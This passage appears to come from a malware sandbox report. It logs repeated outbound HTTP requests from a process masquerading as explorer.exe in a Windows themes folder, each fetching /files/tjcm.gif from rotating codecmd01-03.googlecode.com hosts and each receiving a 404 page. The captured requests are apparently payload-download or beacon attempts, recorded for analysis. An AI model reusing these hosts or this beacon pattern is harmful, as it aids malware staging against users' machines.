                                                                                                                                                          Jan 13, 2025 13:18:27.090284109 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:27.836442947 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:27 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:27.836496115 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                          45 | 192.168.2.4 | 56725 | 66.102.1.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                          Jan 13, 2025 13:18:28.317826986 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:29.043484926 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:28 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:29.043515921 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                          46 | 192.168.2.4 | 56731 | 74.125.133.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                          Jan 13, 2025 13:18:29.728908062 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:30.465274096 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:30 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:30.465377092 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                          47 | 192.168.2.4 | 56742 | 64.233.167.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                          Jan 13, 2025 13:18:30.860106945 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:31.583496094 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:31 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:31.583539963 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                          48 | 192.168.2.4 | 56748 | 66.102.1.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                          Jan 13, 2025 13:18:31.996359110 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:32.715470076 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:32 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:32.715492964 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                          49 | 192.168.2.4 | 56755 | 74.125.133.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                          Jan 13, 2025 13:18:33.120348930 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:34.557426929 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:33 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:34.557492018 CET  494                IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Jan 13, 2025 13:18:34.557506084 CET  494                IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Jan 13, 2025 13:18:34.557703018 CET  1236               IN         HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:33 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:34.557894945 CET  1236               IN         HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:33 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:34.697926044 CET  494                IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
50          192.168.2.4  56760        64.233.167.82   80                7540  C:\Windows\Resources\Themes\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Jan 13, 2025 13:18:35.233967066 CET  215                OUT        GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:18:35.960524082 CET  1236               IN         HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:35 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:35.960575104 CET  494                IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
51          192.168.2.4  56771        66.102.1.82     80                7540  C:\Windows\Resources\Themes\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Jan 13, 2025 13:18:36.395700932 CET  215                OUT        GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:18:37.109847069 CET  1236               IN         HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:37 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:37.109878063 CET  494                IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
52          192.168.2.4  56780        74.125.133.82   80                7540  C:\Windows\Resources\Themes\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Jan 13, 2025 13:18:37.787712097 CET  215                OUT        GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:18:38.514292002 CET  1236               IN         HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:38 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:38.514338970 CET  494                IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
53          192.168.2.4  56787        64.233.167.82   80                7540  C:\Windows\Resources\Themes\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Jan 13, 2025 13:18:38.889600039 CET  215                OUT        GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:18:39.591913939 CET  1236               IN         HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:39 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:39.591972113 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.4 | 56792 | 66.102.1.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:18:40.325479031 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:18:40.921633959 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:40 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:40.921678066 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.4 | 56802 | 74.125.133.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:18:41.281297922 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:18:41.978535891 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:41 GMT
